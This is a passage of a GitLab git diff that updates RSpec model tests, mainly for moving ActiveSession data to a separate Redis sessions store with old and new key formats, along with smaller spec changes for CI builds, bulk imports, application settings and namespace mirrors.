redis.sadd("session:lookup:user:gitlab:#{user.id}", session_ids) + Gitlab::Redis::Sessions.with do |redis| + redis.sadd(lookup_key, %w[a b c]) end - expect(ActiveSession.session_ids_for_user(user.id).map(&:to_s)).to eq(session_ids) + expect(ActiveSession.session_ids_for_user(user.id).map(&:to_s)).to match_array(%w[a b c]) end end describe '.sessions_from_ids' do it 'uses the ActiveSession lookup to return original sessions' do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| # Emulate redis-rack: 
https://github.com/redis-store/redis-rack/blob/c75f7f1a6016ee224e2615017fbfee964f23a837/lib/rack/session/redis.rb#L88 redis.set("session:gitlab:#{rack_session.private_id}", Marshal.dump({ _csrf_token: 'abcd' })) end @@ -128,7 +163,7 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do end it 'avoids a redis lookup for an empty array' do - expect(Gitlab::Redis::SharedState).not_to receive(:with) + expect(Gitlab::Redis::Sessions).not_to receive(:with) expect(ActiveSession.sessions_from_ids([])).to eq([]) end @@ -137,7 +172,7 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do stub_const('ActiveSession::SESSION_BATCH_SIZE', 1) redis = double(:redis) - expect(Gitlab::Redis::SharedState).to receive(:with).and_yield(redis) + expect(Gitlab::Redis::Sessions).to receive(:with).and_yield(redis) sessions = %w[session-a session-b] mget_responses = sessions.map { |session| [Marshal.dump(session)]} @@ -151,49 +186,67 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do it 'sets a new redis entry for the user session and a lookup entry' do ActiveSession.set(user, request) - Gitlab::Redis::SharedState.with do |redis| + session_id = "2::418729c72310bbf349a032f0bb6e3fce9f5a69df8f000d8ae0ac5d159d8f21ae" + + Gitlab::Redis::Sessions.with do |redis| expect(redis.scan_each.to_a).to include( - "session:user:gitlab:#{user.id}:2::418729c72310bbf349a032f0bb6e3fce9f5a69df8f000d8ae0ac5d159d8f21ae", - "session:lookup:user:gitlab:#{user.id}" + described_class.key_name(user.id, session_id), # current session + described_class.key_name_v1(user.id, session_id), # support for mixed deployment + lookup_key ) end end it 'adds timestamps and information from the request' do - Timecop.freeze(Time.zone.parse('2018-03-12 09:06')) do - ActiveSession.set(user, request) + time = Time.zone.parse('2018-03-12 09:06') - session = ActiveSession.list(user) + travel_to(time) do + described_class.set(user, request) - expect(session.count).to eq 1 - 
expect(session.first).to have_attributes( + sessions = described_class.list(user) + + expect(sessions).to contain_exactly have_attributes( ip_address: '127.0.0.1', browser: 'Mobile Safari', os: 'iOS', device_name: 'iPhone 6', device_type: 'smartphone', - created_at: Time.zone.parse('2018-03-12 09:06'), - updated_at: Time.zone.parse('2018-03-12 09:06') + created_at: eq(time), + updated_at: eq(time) ) end end + it 'is possible to log in only using the old session key' do + session_id = "2::418729c72310bbf349a032f0bb6e3fce9f5a69df8f000d8ae0ac5d159d8f21ae" + ActiveSession.set(user, request) + + Gitlab::Redis::SharedState.with do |redis| + redis.del(described_class.key_name(user.id, session_id)) + end + + sessions = ActiveSession.list(user) + + expect(sessions).to be_present + end + it 'keeps the created_at from the login on consecutive requests' do - now = Time.zone.parse('2018-03-12 09:06') + created_at = Time.zone.parse('2018-03-12 09:06') + updated_at = created_at + 1.minute - Timecop.freeze(now) do + travel_to(created_at) do ActiveSession.set(user, request) + end - Timecop.freeze(now + 1.minute) do - ActiveSession.set(user, request) + travel_to(updated_at) do + ActiveSession.set(user, request) - session = ActiveSession.list(user) + session = ActiveSession.list(user) - expect(session.first).to have_attributes( - created_at: Time.zone.parse('2018-03-12 09:06'), - updated_at: Time.zone.parse('2018-03-12 09:07') - ) - end + expect(session.first).to have_attributes( + created_at: eq(created_at), + updated_at: eq(updated_at) + ) end end end @@ -201,22 +254,20 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do describe '.destroy_session' do shared_examples 'removes all session data' do before do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:user:gitlab:#{user.id}:#{active_session_lookup_key}", '') # Emulate redis-rack: 
https://github.com/redis-store/redis-rack/blob/c75f7f1a6016ee224e2615017fbfee964f23a837/lib/rack/session/redis.rb#L88 redis.set("session:gitlab:#{rack_session.private_id}", '') - redis.set(described_class.key_name(user.id, active_session_lookup_key), - Marshal.dump(active_session)) - redis.sadd(described_class.lookup_key_name(user.id), - active_session_lookup_key) + redis.set(session_key, serialized_session) + redis.sadd(lookup_key, active_session_lookup_key) end end it 'removes the devise session' do subject - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.scan_each(match: "session:gitlab:*").to_a).to be_empty end end @@ -224,15 +275,15 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do it 'removes the lookup entry' do subject - Gitlab::Redis::SharedState.with do |redis| - expect(redis.scan_each(match: "session:lookup:user:gitlab:#{user.id}").to_a).to be_empty + Gitlab::Redis::Sessions.with do |redis| + expect(redis.scan_each(match: lookup_key).to_a).to be_empty end end it 'removes the ActiveSession' do subject - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| expect(redis.scan_each(match: "session:user:gitlab:*").to_a).to be_empty end end @@ -253,7 +304,19 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do let(:active_session) { ActiveSession.new(session_private_id: rack_session.private_id) } let(:active_session_lookup_key) { rack_session.private_id } - include_examples 'removes all session data' + context 'when using old session key serialization' do + let(:session_key) { described_class.key_name_v1(user.id, active_session_lookup_key) } + let(:serialized_session) { Marshal.dump(active_session) } + + include_examples 'removes all session data' + end + + context 'when using new session key serialization' do + let(:session_key) { described_class.key_name(user.id, active_session_lookup_key) } + let(:serialized_session) { active_session.dump } + 
+ include_examples 'removes all session data' + end end end end @@ -265,19 +328,17 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do ActiveSession.destroy_all_but_current(user, nil) end - context 'with user sessions' do + shared_examples 'with user sessions' do let(:current_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } before do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| # setup for current user [current_session_id, '59822c7d9fcdfa03725eff41782ad97d'].each do |session_public_id| session_private_id = Rack::Session::SessionId.new(session_public_id).private_id active_session = ActiveSession.new(session_private_id: session_private_id) - redis.set(described_class.key_name(user.id, session_private_id), - Marshal.dump(active_session)) - redis.sadd(described_class.lookup_key_name(user.id), - session_private_id) + redis.set(key_name(user.id, session_private_id), dump_session(active_session)) + redis.sadd(lookup_key, session_private_id) end # setup for unrelated user @@ -285,10 +346,8 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do session_private_id = Rack::Session::SessionId.new('5c8611e4f9c69645ad1a1492f4131358').private_id active_session = ActiveSession.new(session_private_id: session_private_id) - redis.set(described_class.key_name(unrelated_user_id, session_private_id), - Marshal.dump(active_session)) - redis.sadd(described_class.lookup_key_name(unrelated_user_id), - session_private_id) + redis.set(key_name(unrelated_user_id, session_private_id), dump_session(active_session)) + redis.sadd(described_class.lookup_key_name(unrelated_user_id), session_private_id) end end @@ -303,19 +362,17 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do session_private_id = Rack::Session::SessionId.new(current_session_id).private_id ActiveSession.destroy_all_but_current(user, request.session) - Gitlab::Redis::SharedState.with do |redis| - expect( - 
redis.smembers(described_class.lookup_key_name(user.id)) - ).to eq([session_private_id]) + Gitlab::Redis::Sessions.with do |redis| + expect(redis.smembers(lookup_key)).to contain_exactly session_private_id end end it 'does not remove impersonated sessions' do impersonated_session_id = '6919a6f1bb119dd7396fadc38fd18eee' - Gitlab::Redis::SharedState.with do |redis| - redis.set(described_class.key_name(user.id, impersonated_session_id), - Marshal.dump(ActiveSession.new(session_id: Rack::Session::SessionId.new(impersonated_session_id), is_impersonated: true))) - redis.sadd(described_class.lookup_key_name(user.id), impersonated_session_id) + Gitlab::Redis::Sessions.with do |redis| + redis.set(key_name(user.id, impersonated_session_id), + dump_session(ActiveSession.new(session_id: Rack::Session::SessionId.new(impersonated_session_id), is_impersonated: true))) + redis.sadd(lookup_key, impersonated_session_id) end expect { ActiveSession.destroy_all_but_current(user, request.session) }.to change { ActiveSession.session_ids_for_user(user.id).size }.from(3).to(2) @@ -323,155 +380,289 @@ RSpec.describe ActiveSession, :clean_gitlab_redis_shared_state do expect(ActiveSession.session_ids_for_user(9999).size).to eq(1) end end - end - describe '.cleanup' do - before do - stub_const("ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS", 5) - end + context 'with legacy sessions' do + def key_name(user_id, id) + described_class.key_name_v1(user_id, id) + end - it 'removes obsolete lookup entries' do - Gitlab::Redis::SharedState.with do |redis| - redis.set("session:user:gitlab:#{user.id}:6919a6f1bb119dd7396fadc38fd18d0d", '') - redis.sadd("session:lookup:user:gitlab:#{user.id}", '6919a6f1bb119dd7396fadc38fd18d0d') - redis.sadd("session:lookup:user:gitlab:#{user.id}", '59822c7d9fcdfa03725eff41782ad97d') + def dump_session(session) + Marshal.dump(session) end - ActiveSession.cleanup(user) + it_behaves_like 'with user sessions' + end - Gitlab::Redis::SharedState.with do |redis| - 
expect(redis.smembers("session:lookup:user:gitlab:#{user.id}")).to eq ['6919a6f1bb119dd7396fadc38fd18d0d'] + context 'with new sessions' do + def key_name(user_id, id) + described_class.key_name(user_id, id) + end + + def dump_session(session) + session.dump end + + it_behaves_like 'with user sessions' end + end - it 'does not bail if there are no lookup entries' do - ActiveSession.cleanup(user) + describe '.cleanup' do + before do + stub_const("ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS", 5) end - context 'cleaning up old sessions' do - let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } - let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + shared_examples 'cleaning up' do + context 'when removing obsolete sessions' do + let(:current_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } - before do - Gitlab::Redis::SharedState.with do |redis| - (1..max_number_of_sessions_plus_two).each do |number| - redis.set( - "session:user:gitlab:#{user.id}:#{number}", - Marshal.dump(ActiveSession.new(session_id: number.to_s, updated_at: number.days.ago)) - ) - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - "#{number}" - ) + it 'removes obsolete lookup entries' do + Gitlab::Redis::Sessions.with do |redis| + redis.set(session_key, '') + redis.sadd(lookup_key, current_session_id) + redis.sadd(lookup_key, '59822c7d9fcdfa03725eff41782ad97d') + end + + ActiveSession.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + expect(redis.smembers(lookup_key)).to contain_exactly current_session_id end end end - it 'removes obsolete active sessions entries' do + it 'does not bail if there are no lookup entries' do ActiveSession.cleanup(user) + end - Gitlab::Redis::SharedState.with do |redis| - sessions = redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a + context 'cleaning up old sessions' do + let(:max_number_of_sessions_plus_one) { 
ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } + let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + + before do + Gitlab::Redis::Sessions.with do |redis| + max_number_of_sessions_plus_two.times do |number| + redis.set( + key_name(user.id, number), + dump_session(ActiveSession.new(session_id: number.to_s, updated_at: number.days.ago)) + ) + redis.sadd(lookup_key, number.to_s) + end + end + end + + it 'removes obsolete active sessions entries' do + ActiveSession.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + sessions = described_class.list(user) - expect(sessions.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(sessions).not_to include("session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_one}", "session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_two}") + expect(sessions.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(sessions).not_to include( + have_attributes(session_id: max_number_of_sessions_plus_one), + have_attributes(session_id: max_number_of_sessions_plus_two) + ) + end end - end - it 'removes obsolete lookup entries' do - ActiveSession.cleanup(user) + it 'removes obsolete lookup entries' do + ActiveSession.cleanup(user) - Gitlab::Redis::SharedState.with do |redis| - lookup_entries = redis.smembers("session:lookup:user:gitlab:#{user.id}") + Gitlab::Redis::Sessions.with do |redis| + lookup_entries = redis.smembers(lookup_key) - expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(lookup_entries).not_to include(max_number_of_sessions_plus_one.to_s, max_number_of_sessions_plus_two.to_s) + expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(lookup_entries).not_to include(max_number_of_sessions_plus_one.to_s, max_number_of_sessions_plus_two.to_s) + end end - end - it 'removes obsolete lookup entries even without active session' do - 
Gitlab::Redis::SharedState.with do |redis| - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - "#{max_number_of_sessions_plus_two + 1}" - ) + it 'removes obsolete lookup entries even without active session' do + Gitlab::Redis::Sessions.with do |redis| + redis.sadd(lookup_key, "#{max_number_of_sessions_plus_two + 1}") + end + + ActiveSession.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + lookup_entries = redis.smembers(lookup_key) + + expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(lookup_entries).not_to include( + max_number_of_sessions_plus_one.to_s, + max_number_of_sessions_plus_two.to_s, + (max_number_of_sessions_plus_two + 1).to_s + ) + end end - ActiveSession.cleanup(user) + context 'when the number of active sessions is lower than the limit' do + before do + Gitlab::Redis::Sessions.with do |redis| + ((max_number_of_sessions_plus_two - 4)..max_number_of_sessions_plus_two).each do |number| + redis.del(key_name(user.id, number)) + end + end + end - Gitlab::Redis::SharedState.with do |redis| - lookup_entries = redis.smembers("session:lookup:user:gitlab:#{user.id}") + it 'does not remove active session entries, but removes lookup entries' do + lookup_entries_before_cleanup = Gitlab::Redis::Sessions.with do |redis| + redis.smembers(lookup_key) + end - expect(lookup_entries.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(lookup_entries).not_to include( - max_number_of_sessions_plus_one.to_s, - max_number_of_sessions_plus_two.to_s, - (max_number_of_sessions_plus_two + 1).to_s - ) + sessions_before_cleanup = described_class.list(user) + + described_class.cleanup(user) + + Gitlab::Redis::Sessions.with do |redis| + lookup_entries = redis.smembers(lookup_key) + sessions = described_class.list(user) + + expect(sessions.count).to eq(sessions_before_cleanup.count) + expect(lookup_entries.count).to be < lookup_entries_before_cleanup.count + end + end end end - context 'when the number 
of active sessions is lower than the limit' do + context 'cleaning up old sessions stored by Rack::Session::SessionId#private_id' do + let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } + let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + before do - Gitlab::Redis::SharedState.with do |redis| - ((max_number_of_sessions_plus_two - 4)..max_number_of_sessions_plus_two).each do |number| - redis.del("session:user:gitlab:#{user.id}:#{number}") + Gitlab::Redis::Sessions.with do |redis| + (1..max_number_of_sessions_plus_two).each do |number| + redis.set( + key_name(user.id, number), + dump_session(ActiveSession.new(session_private_id: number.to_s, updated_at: number.days.ago)) + ) + redis.sadd(lookup_key, number.to_s) end end end - it 'does not remove active session entries, but removes lookup entries' do - lookup_entries_before_cleanup = Gitlab::Redis::SharedState.with do |redis| - redis.smembers("session:lookup:user:gitlab:#{user.id}") - end + it 'removes obsolete active sessions entries' do + described_class.cleanup(user) - sessions_before_cleanup = Gitlab::Redis::SharedState.with do |redis| - redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a - end + Gitlab::Redis::Sessions.with do |redis| + sessions = described_class.list(user) - ActiveSession.cleanup(user) - - Gitlab::Redis::SharedState.with do |redis| - lookup_entries = redis.smembers("session:lookup:user:gitlab:#{user.id}") - sessions = redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a - expect(sessions.count).to eq(sessions_before_cleanup.count) - expect(lookup_entries.count).to be < lookup_entries_before_cleanup.count + expect(sessions.count).to eq(described_class::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) + expect(sessions).not_to include( + key_name(user.id, max_number_of_sessions_plus_one), + key_name(user.id, max_number_of_sessions_plus_two) + ) end end end end - context 'cleaning up old sessions 
stored by Rack::Session::SessionId#private_id' do - let(:max_number_of_sessions_plus_one) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 1 } - let(:max_number_of_sessions_plus_two) { ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS + 2 } + context 'with legacy sessions' do + let(:session_key) { described_class.key_name_v1(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name_v1(user_id, session_id) + end + + def dump_session(session) + Marshal.dump(session) + end + + it_behaves_like 'cleaning up' + end + + context 'with new sessions' do + let(:session_key) { described_class.key_name(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name(user_id, session_id) + end + + def dump_session(session) + session.dump + end + + it_behaves_like 'cleaning up' + end + end + + describe '.cleaned_up_lookup_entries' do + before do + stub_const("ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS", 5) + end + + shared_examples 'cleaning up lookup entries' do + let(:current_session_id) { '6919a6f1bb119dd7396fadc38fd18d0d' } + let(:active_count) { 3 } before do Gitlab::Redis::SharedState.with do |redis| - (1..max_number_of_sessions_plus_two).each do |number| + active_count.times do |number| redis.set( - "session:user:gitlab:#{user.id}:#{number}", - Marshal.dump(ActiveSession.new(session_private_id: number.to_s, updated_at: number.days.ago)) - ) - redis.sadd( - "session:lookup:user:gitlab:#{user.id}", - "#{number}" + key_name(user.id, number), + dump_session(ActiveSession.new(session_id: number.to_s, updated_at: number.days.ago)) ) + + redis.sadd(lookup_key, number.to_s) end + + redis.sadd(lookup_key, (active_count + 1).to_s) + redis.sadd(lookup_key, (active_count + 2).to_s) end end - it 'removes obsolete active sessions entries' do - ActiveSession.cleanup(user) + it 'removes obsolete lookup entries' do + active = Gitlab::Redis::SharedState.with do |redis| + 
ActiveSession.cleaned_up_lookup_entries(redis, user) + end + + expect(active.count).to eq(active_count) Gitlab::Redis::SharedState.with do |redis| - sessions = redis.scan_each(match: "session:user:gitlab:#{user.id}:*").to_a + lookup_entries = redis.smembers(lookup_key) - expect(sessions.count).to eq(ActiveSession::ALLOWED_NUMBER_OF_ACTIVE_SESSIONS) - expect(sessions).not_to( - include("session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_one}", - "session:user:gitlab:#{user.id}:#{max_number_of_sessions_plus_two}")) + expect(lookup_entries.count).to eq(active_count) + expect(lookup_entries).not_to include( + (active_count + 1).to_s, + (active_count + 2).to_s + ) end end + + it 'reports the removed entries' do + removed = [] + Gitlab::Redis::SharedState.with do |redis| + ActiveSession.cleaned_up_lookup_entries(redis, user, removed) + end + + expect(removed.count).to eq(2) + end + end + + context 'with legacy sessions' do + let(:session_key) { described_class.key_name_v1(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name_v1(user_id, session_id) + end + + def dump_session(session) + Marshal.dump(session) + end + + it_behaves_like 'cleaning up lookup entries' + end + + context 'with new sessions' do + let(:session_key) { described_class.key_name(user.id, current_session_id) } + + def key_name(user_id, session_id) + described_class.key_name(user_id, session_id) + end + + def dump_session(session) + session.dump + end + + it_behaves_like 'cleaning up lookup entries' end end end diff --git a/spec/models/analytics/cycle_analytics/project_stage_spec.rb b/spec/models/analytics/cycle_analytics/project_stage_spec.rb index 9efe90e7d41..a67f9fec443 100644 --- a/spec/models/analytics/cycle_analytics/project_stage_spec.rb +++ b/spec/models/analytics/cycle_analytics/project_stage_spec.rb @@ -29,4 +29,29 @@ RSpec.describe Analytics::CycleAnalytics::ProjectStage do let(:default_params) { { project: project } } end end + + describe 
'.distinct_stages_within_hierarchy' do + let_it_be(:top_level_group) { create(:group) } + let_it_be(:sub_group_1) { create(:group, parent: top_level_group) } + let_it_be(:sub_group_2) { create(:group, parent: sub_group_1) } + + let_it_be(:project_1) { create(:project, group: sub_group_1) } + let_it_be(:project_2) { create(:project, group: sub_group_2) } + let_it_be(:project_3) { create(:project, group: top_level_group) } + + let_it_be(:stage1) { create(:cycle_analytics_project_stage, project: project_1, start_event_identifier: :issue_created, end_event_identifier: :issue_deployed_to_production) } + let_it_be(:stage2) { create(:cycle_analytics_project_stage, project: project_3, start_event_identifier: :issue_created, end_event_identifier: :issue_deployed_to_production) } + + let_it_be(:stage3) { create(:cycle_analytics_project_stage, project: project_1, start_event_identifier: :merge_request_created, end_event_identifier: :merge_request_merged) } + let_it_be(:stage4) { create(:cycle_analytics_project_stage, project: project_3, start_event_identifier: :merge_request_created, end_event_identifier: :merge_request_merged) } + + subject(:distinct_start_and_end_event_identifiers) { described_class.distinct_stages_within_hierarchy(top_level_group).to_a.pluck(:start_event_identifier, :end_event_identifier) } + + it 'returns distinct stages by start and end events (using stage_event_hash_id)' do + expect(distinct_start_and_end_event_identifiers).to match_array([ + %w[issue_created issue_deployed_to_production], + %w[merge_request_created merge_request_merged] + ]) + end + end end diff --git a/spec/models/application_setting_spec.rb b/spec/models/application_setting_spec.rb index 8ad83da61f3..67314084c4f 100644 --- a/spec/models/application_setting_spec.rb +++ b/spec/models/application_setting_spec.rb @@ -247,6 +247,7 @@ RSpec.describe ApplicationSetting do end it { is_expected.to allow_value('grpc://example.org/spam_check').for(:spam_check_endpoint_url) } + it { 
is_expected.to allow_value('tls://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('https://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('nonsense').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value(nil).for(:spam_check_endpoint_url) } @@ -259,6 +260,7 @@ RSpec.describe ApplicationSetting do end it { is_expected.to allow_value('grpc://example.org/spam_check').for(:spam_check_endpoint_url) } + it { is_expected.to allow_value('tls://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('https://example.org/spam_check').for(:spam_check_endpoint_url) } it { is_expected.not_to allow_value('nonsense').for(:spam_check_endpoint_url) } it { is_expected.to allow_value(nil).for(:spam_check_endpoint_url) } @@ -1239,4 +1241,30 @@ RSpec.describe ApplicationSetting do expect(subject.kroki_formats_excalidraw).to eq(true) end end + + describe '#static_objects_external_storage_auth_token=' do + subject { setting.static_objects_external_storage_auth_token = token } + + let(:token) { 'Test' } + + it 'stores an encrypted version of the token' do + subject + + expect(setting[:static_objects_external_storage_auth_token]).to be_nil + expect(setting[:static_objects_external_storage_auth_token_encrypted]).to be_present + expect(setting.static_objects_external_storage_auth_token).to eq('Test') + end + + context 'when token is empty' do + let(:token) { '' } + + it 'removes an encrypted version of the token' do + subject + + expect(setting[:static_objects_external_storage_auth_token]).to be_nil + expect(setting[:static_objects_external_storage_auth_token_encrypted]).to be_nil + expect(setting.static_objects_external_storage_auth_token).to be_nil + end + end + end end diff --git a/spec/models/bulk_imports/entity_spec.rb b/spec/models/bulk_imports/entity_spec.rb index cc66572cd6f..e5bbac62dcc 100644 --- a/spec/models/bulk_imports/entity_spec.rb +++ 
b/spec/models/bulk_imports/entity_spec.rb @@ -252,4 +252,60 @@ RSpec.describe BulkImports::Entity, type: :model do .to eq("/groups/#{entity.encoded_source_full_path}/export_relations/download?relation=test") end end + + describe '#entity_type' do + it 'returns entity type' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.entity_type).to eq('group') + expect(project_entity.entity_type).to eq('project') + end + end + + describe '#project?' do + it 'returns true if project entity' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.project?).to eq(false) + expect(project_entity.project?).to eq(true) + end + end + + describe '#group?' do + it 'returns true if group entity' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.group?).to eq(true) + expect(project_entity.group?).to eq(false) + end + end + + describe '#base_resource_url_path' do + it 'returns base entity url path' do + entity = build(:bulk_import_entity) + + expect(entity.base_resource_url_path).to eq("/groups/#{entity.encoded_source_full_path}") + end + end + + describe '#wiki_url_path' do + it 'returns entity wiki url path' do + entity = build(:bulk_import_entity) + + expect(entity.wikis_url_path).to eq("/groups/#{entity.encoded_source_full_path}/wikis") + end + end + + describe '#update_service' do + it 'returns correct update service class' do + group_entity = build(:bulk_import_entity) + project_entity = build(:bulk_import_entity, :project_entity) + + expect(group_entity.update_service).to eq(::Groups::UpdateService) + expect(project_entity.update_service).to eq(::Projects::UpdateService) + end + end end diff --git a/spec/models/chat_name_spec.rb b/spec/models/chat_name_spec.rb index 67e0f98d147..1d2ad8b4dce 100644 --- a/spec/models/chat_name_spec.rb +++ 
b/spec/models/chat_name_spec.rb @@ -46,9 +46,5 @@ RSpec.describe ChatName do it_behaves_like 'it has loose foreign keys' do let(:factory_name) { :chat_name } - - before do - Ci::PipelineChatData # ensure that the referenced model is loaded - end end end diff --git a/spec/models/ci/build_spec.rb b/spec/models/ci/build_spec.rb index b7de8ca4337..b9a12339e61 100644 --- a/spec/models/ci/build_spec.rb +++ b/spec/models/ci/build_spec.rb @@ -29,7 +29,7 @@ RSpec.describe Ci::Build do it { is_expected.to have_one(:deployment) } it { is_expected.to have_one(:runner_session) } it { is_expected.to have_one(:trace_metadata) } - it { is_expected.to have_many(:terraform_state_versions).dependent(:nullify).inverse_of(:build) } + it { is_expected.to have_many(:terraform_state_versions).inverse_of(:build) } it { is_expected.to validate_presence_of(:ref) } @@ -1994,6 +1994,14 @@ RSpec.describe Ci::Build do it { is_expected.not_to be_retryable } end + + context 'when deployment is rejected' do + before do + build.drop!(:deployment_rejected) + end + + it { is_expected.not_to be_retryable } + end end end @@ -2498,7 +2506,7 @@ RSpec.describe Ci::Build do it { is_expected.to start_with(project.web_url[0..6]) } it { is_expected.to include(build.token) } it { is_expected.to include('gitlab-ci-token') } - it { is_expected.to include(project.web_url[7..-1]) } + it { is_expected.to include(project.web_url[7..]) } end context 'when token is empty' do @@ -3421,10 +3429,6 @@ RSpec.describe Ci::Build do end describe '#scoped_variables' do - before do - pipeline.clear_memoization(:predefined_vars_in_builder_enabled) - end - it 'records a prometheus metric' do histogram = double(:histogram) expect(::Gitlab::Ci::Pipeline::Metrics).to receive(:pipeline_builder_scoped_variables_histogram) @@ -3522,22 +3526,6 @@ RSpec.describe Ci::Build do build.scoped_variables end - - context 'when ci builder feature flag is disabled' do - before do - stub_feature_flags(ci_predefined_vars_in_builder: false) - end - - 
it 'does not delegate to the variable builders' do - expect_next_instance_of(Gitlab::Ci::Variables::Builder) do |builder| - expect(builder).not_to receive(:predefined_variables) - end - - build.scoped_variables - end - - it_behaves_like 'calculates scoped_variables' - end end describe '#simple_variables_without_dependencies' do @@ -3782,6 +3770,12 @@ RSpec.describe Ci::Build do build.enqueue end + + it 'queues BuildHooksWorker' do + expect(BuildHooksWorker).to receive(:perform_async).with(build.id) + + build.enqueue + end end describe 'state transition: pending: :running' do @@ -4474,7 +4468,7 @@ RSpec.describe Ci::Build do 'create' => 0, 'update' => 1, 'delete' => 0, - 'job_name' => build.options.dig(:artifacts, :name).to_s + 'job_name' => build.name ) ) ) @@ -5423,4 +5417,13 @@ RSpec.describe Ci::Build do expect(subject).to be true end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :ci_build } + end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:model) { create(:ci_build, user: create(:user)) } + let!(:parent) { model.user } + end end diff --git a/spec/models/ci/job_artifact_spec.rb b/spec/models/ci/job_artifact_spec.rb index d63f87e8943..38061e0975f 100644 --- a/spec/models/ci/job_artifact_spec.rb +++ b/spec/models/ci/job_artifact_spec.rb @@ -700,4 +700,8 @@ RSpec.describe Ci::JobArtifact do when changes or new entries are made. 
MSG end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :ci_job_artifact } + end end diff --git a/spec/models/ci/namespace_mirror_spec.rb b/spec/models/ci/namespace_mirror_spec.rb new file mode 100644 index 00000000000..b4c71f51377 --- /dev/null +++ b/spec/models/ci/namespace_mirror_spec.rb @@ -0,0 +1,94 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Ci::NamespaceMirror do + let!(:group1) { create(:group) } + let!(:group2) { create(:group, parent: group1) } + let!(:group3) { create(:group, parent: group2) } + let!(:group4) { create(:group, parent: group3) } + + describe '.sync!' do + let!(:event) { namespace.sync_events.create! } + + subject(:sync) { described_class.sync!(event.reload) } + + context 'when namespace hierarchy does not exist in the first place' do + let(:namespace) { group3 } + + it 'creates the hierarchy' do + expect { sync }.to change { described_class.count }.from(0).to(1) + + expect(namespace.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id, group2.id, group3.id]) + end + end + + context 'when namespace hierarchy does already exist' do + let(:namespace) { group3 } + + before do + described_class.create!(namespace: namespace, traversal_ids: [namespace.id]) + end + + it 'updates the hierarchy' do + expect { sync }.not_to change { described_class.count } + + expect(namespace.ci_namespace_mirror).to have_attributes(traversal_ids: [group1.id, group2.id, group3.id]) + end + end + + # I did not extract this context to a `shared_context` because the behavior will change + # after implementing the TODO in `Ci::NamespaceMirror.sync!` + context 'changing the middle namespace' do + let(:namespace) { group2 } + + before do + described_class.create!(namespace_id: group1.id, traversal_ids: [group1.id]) + described_class.create!(namespace_id: group2.id, traversal_ids: [group1.id, group2.id]) + 